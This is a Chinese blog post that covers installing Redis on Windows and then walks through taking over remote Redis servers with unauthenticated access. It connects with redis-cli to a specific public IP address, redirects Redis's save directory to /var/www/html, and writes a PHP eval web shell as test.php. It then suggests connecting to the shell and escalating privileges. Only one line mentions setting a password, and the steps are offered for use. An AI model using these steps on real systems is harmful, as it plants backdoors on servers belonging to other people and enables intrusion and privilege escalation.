redis安装:

windows安装包:http://pan.baidu.com/s/1i3jLlC5

下载下来之后,开始安装:

redis-server.exe redis.conf:

简单一步,安装成功,保持这个windows持续运行~

查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis的密码~

接下来,开始利用redis-cli.exe来进行远程redis的入侵:

如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:

开启redis客户端

输入以下命令来连接远程redis

redis-cli -h 125.39.185.150 -p 6379

接下来,在远程redis内存中设置数据:

config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)

config set dbfilename test.php(在内存中的/var/www/html目录下建立一个test.php文件)

set xiaoma "<?php @eval($_POST[mi]);?>"(设置key-value,此时该值在Memory中)

save (将Memory中的key-value保存到硬盘,并保存为test.php文件)

四个OK就搞定了~

此时,就可以直接连shell,开始提权了~

redis入侵参考:

http://www.wooyun.org/bugs/wooyun-2015-0101465

http://www.wooyun.org/bugs/wooyun-2010-0105096

最新文章

  1. React生命周期
  2. Centos7 基本shell命令
  3. C#中static关键字的作用
  4. [LintCode] Length of Last Word 求末尾单词的长度
  5. 自定义一个可以使用foreach语句进行迭代的类(IEnumerable)
  6. oracle 求两个时间点直接的分钟、小时数
  7. 【转】开发者教程:如何将Android应用发布到Google Play(Android Market)官方市场
  8. nginx &amp;amp; flup &amp;amp; django &amp;amp; python3.x @ window7配置备忘录
  9. 读书笔记系列01-《收获、不止Oracle》
  10. .NET Core 2.1 Preview 2发布 - April 10, 2018
  11. OpenCV-Python:Harris角点检测与Shi-Tomasi角点检测
  12. iOS中Realm数据库的基本用法
  13. db2 查询表空间使用情况
  14. 在windows 10下使用docker
  15. photoshop cs6安装过程中安装程序遇到错误:请重启计算机,解决办法
  16. cogs 330. [NOI2003] 文本编辑器
  17. Ubuntu16.04下Mongodb(离线安装方式|非apt-get)安装部署步骤(图文详解)(博主推荐)
  18. HDU1102&amp;&amp;POJ2421 Constructing Roads 2017-04-12 19:09 44人阅读 评论(0) 收藏
  19. java反射之构造方法(三)
  20. docker 数据卷挂载总结

热门文章

  1. 使用CXF 来发布一个 service
  2. java-获取随机字符串
  3. Bootstrap表单布局样式
  4. Bean 的作用域
  5. Linux命令:修改文件权限命令chmod、chgrp、chown的区别
  6. 根据位置信息提取 fasta 文件中的序列 -- extract fasta sequence by their position
  7. perl split 的一种特殊用法
  8. Unity 移动端触摸屏操作
  9. linux软件包的安装和卸载
  10. codevs 3143 二叉树的序遍历